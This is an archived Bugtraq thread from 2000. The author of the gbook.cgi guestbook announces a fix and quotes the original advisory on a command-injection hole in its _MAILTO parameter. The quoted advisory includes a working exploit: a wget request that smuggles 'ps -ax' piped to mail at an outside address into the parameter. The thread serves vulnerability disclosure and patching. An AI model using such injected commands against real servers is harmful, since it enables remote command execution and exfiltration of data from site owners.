[17607] in bugtraq
Re: [hacksware] gbook.cgi remote command execution vulnerability
daemon@ATHENA.MIT.EDU (William Kendrick)
Sun Nov 12 14:08:23 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <200011120300.eAC30wg30450@sonic.net>
Date: Sat, 11 Nov 2000 19:00:58 -0800
Reply-To: William Kendrick <nbs@SONIC.NET>
From: William Kendrick <nbs@SONIC.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
So far as I can tell, it's fixed... Please let me know if anyone
sees any other glaring holes. It IS rather ancient software.
-bill!
Forwarded message:
> From mbrennen@fni.com Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennen@fni.com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennen@fni.com>
> To: William Kendrick <nbs@sonic.net>
> Cc: mat@hacksware.com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
> (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974@sonic.net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000@henry.fni.com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
> -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly! My @zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> > ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > >
> > >
> > > Don't know if you saw this or not; you probably have by now. There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > > -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <mat@IVNTECH.COM>
> > > To: BUGTRAQ@SECURITYFOCUS.COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > > Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > > GBook - A web site guestbook
> > > By Bill Kendrick
> > > kendrick@zippy.sonoma.edu
> > > http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mat@hacksware.com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > > gbook.cgi is used by some web sites.
> > > We can set _MAILTO parameter, and popen is called to execute mail command.
> > > If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
> > > It's so trivial. :)
> > > 7. Exploits
> > > This exploit executes "ps -ax" command and sends the result to haha@yaho.com.
> > >
> > > wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> > >
> > >
> > > =================================================
> > > | mat@hacksware.com |
> > > | http://hacksware.com |
> > > =================================================
> > >
> > >
> >
>